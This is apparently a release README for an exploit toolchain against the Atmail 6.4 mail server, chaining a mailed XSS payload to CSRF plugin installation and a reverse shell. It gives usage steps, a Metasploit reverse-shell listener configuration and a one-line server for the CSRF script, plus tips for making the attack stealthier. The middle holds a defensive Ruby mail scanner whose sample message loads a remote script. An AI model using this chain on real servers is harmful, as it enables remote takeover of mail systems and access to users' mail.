
AtMail Email Server Appliance 6.4 - Exploit toolchain (XSS > CSRF > RCE)

[PacketStorm] [WLB-2020080010]

Disclaimer: this exploit toolchain was inspired by EDB-ID 20009.

Goal

The goal of this exploit toolchain is to replace EDB-ID 20009.

Pros of this toolchain over the EDB-ID 20009 exploit:

  • Simple to use
  • Reusable
  • Dynamically generated payloads
  • Easily editable / hackable
  • Clear code and readable plugin source

Cons of EDB-ID 20009 exploit:

  • Not customizable (static hardcoded payloads)
  • Complex to use (many hardcoded values need to be replaced and the code adapted to suit the target environment)
  • One-shot use (all values hardcoded)
  • The plugin tgz archive is embedded as a hex string, so the plugin source code can't easily be read or modified

Requirements

  • (Optional) Metasploit Framework (msfvenom for reverse shell generation)
  • tar (to generate the plugin archive)
  • ruby (payload preparation and XSS delivery over SMTP)
  • (Optional) A web server to deliver the XSS payload
  • Knowing an Atmail admin email address (only admins can install a plugin)
  • Passive interaction (the admin needs to open the email containing the XSS payload in the WebMail while having a valid administration interface session running)

Install the requirements on Arch Linux:

$ sudo pacman -S metasploit tar ruby

How it works

  1. An email containing an XSS payload is sent to the admin
  2. The XSS payload loads the JavaScript CSRF file from a remote server
  3. The CSRF installs a plugin
  4. Once installed, the plugin executes a system command: the reverse shell
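Steps 1 and 2 are the part of the chain a mail-side control can see. As an added example (not part of this toolchain or of Atmail), the Ruby script below flags inbound HTML mail addressed to an admin mailbox that carries active content: a remote script load, an inline script, or an HTML event-handler attribute. The admin address list and the sample message are constructed for the example.

```ruby
# Added example, not part of the Atmail toolchain: flag inbound HTML mail
# to admin mailboxes that carries the active content the XSS stage relies on.
require 'uri'

ADMIN_ADDRESSES = ['admin@mail.example.test'].freeze # constructed address

# Active content patterns: <script src=...>, any <script> tag (attributes captured), on*= handlers.
SCRIPT_SRC = /<script[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/i
SCRIPT_TAG = /<script\b([^>]*)>/i
EVENT_ATTR = /\bon[a-z]+\s*=/i

# Split a raw RFC 5322 message into a lower-cased header hash and a body string.
def parse_message(raw)
  head, body = raw.split(/\r?\n\r?\n/, 2)
  headers = {}
  head.to_s.each_line do |line|
    key, value = line.chomp.split(':', 2)
    headers[key.strip.downcase] = value.strip if value
  end
  [headers, body.to_s]
end

# Return the findings for one message; an empty array means nothing to flag.
# Only HTML mail addressed to an admin mailbox is inspected.
def scan_message(raw, admins: ADMIN_ADDRESSES)
  headers, body = parse_message(raw)
  findings = []
  to = headers['to'].to_s.downcase
  html = headers['content-type'].to_s.downcase.include?('text/html')
  return findings unless html && admins.any? { |a| to.include?(a) }

  body.scan(SCRIPT_SRC).flatten.each do |src|
    host = (URI.parse(src).host rescue nil)
    findings << "remote script load from #{host || src}"
  end
  inline = body.scan(SCRIPT_TAG).count { |attrs| attrs.first !~ /\bsrc\s*=/i }
  findings << "#{inline} inline <script> element(s)" if inline > 0
  findings << 'HTML event-handler attribute' if body =~ EVENT_ATTR
  findings
end

# Constructed sample: HTML mail that pulls a script from a third-party host.
SAMPLE_MAIL = <<~MAIL
  From: someone@external.test
  To: admin@mail.example.test
  Content-Type: text/html; charset=utf-8

  <html><body><p>hi</p><img src="x" onerror="x"><script src="http://203.0.113.5:8000/csrf_plugin.js"></script></body></html>
MAIL
```

Running `scan_message(SAMPLE_MAIL)` returns the remote script host and the event-handler finding; a plain-text message or one addressed to a non-admin mailbox returns an empty array.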

Exploit files:

  • config.yml contains the toolchain configuration
  • exploit.sh is the exploit wrapper that needs to be executed
  • xss_mail.rb sends the email containing the XSS to the admin via the Atmail SMTP server (unauthenticated)
  • csrf_prepare.rb prepares the CSRF payload (setting the target and encoding the plugin archive)
  • rce_prepare.rb prepares the RCE (generating the reverse shell and creating the plugin archive)
  • csrf_plugin.js is the prepared CSRF payload
  • noraj/ is the folder containing the uncompressed plugin directory structure

Usage

The exploit toolchain requires only two manual steps:

  1. Edit config.yml
  2. Launch exploit.sh

But before launching the attack, a web server needs to be serving the JavaScript CSRF file and a reverse shell listener needs to be waiting for the connection. So the attack looks more like:

  1. Edit config.yml
  2. Start an HTTP server that will deliver csrf_plugin.js
  3. Start the reverse shell listener
  4. Launch exploit.sh

Example of a one-line HTTP server:

$ ruby -run -e httpd . -p 8000

Example of reverse shell listener:

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload php/reverse_php
payload => php/reverse_php
msf5 exploit(multi/handler) > set LHOST 1.1.1.1
LHOST => 1.1.1.1
msf5 exploit(multi/handler) > set LPORT 8080
LPORT => 8080
msf5 exploit(multi/handler) > run

Notes

  • The RCE occurs only when the plugin is installed; if the reverse shell connection is lost, re-executing means re-installing the plugin, so the admin only needs to reload their mailbox.
  • Red teamers could enhance the exploit to auto-remove the email once read and to remove the plugin once the reverse shell connection is established: less persistent but more stealthy.
  • msfvenom (MSF 5.0) only supports an IP address for LHOST, not a domain.
  • As said in Requirements, the admin needs to be logged in to both the WebMail and the administration interface.
  • Tested with ruby 2.7.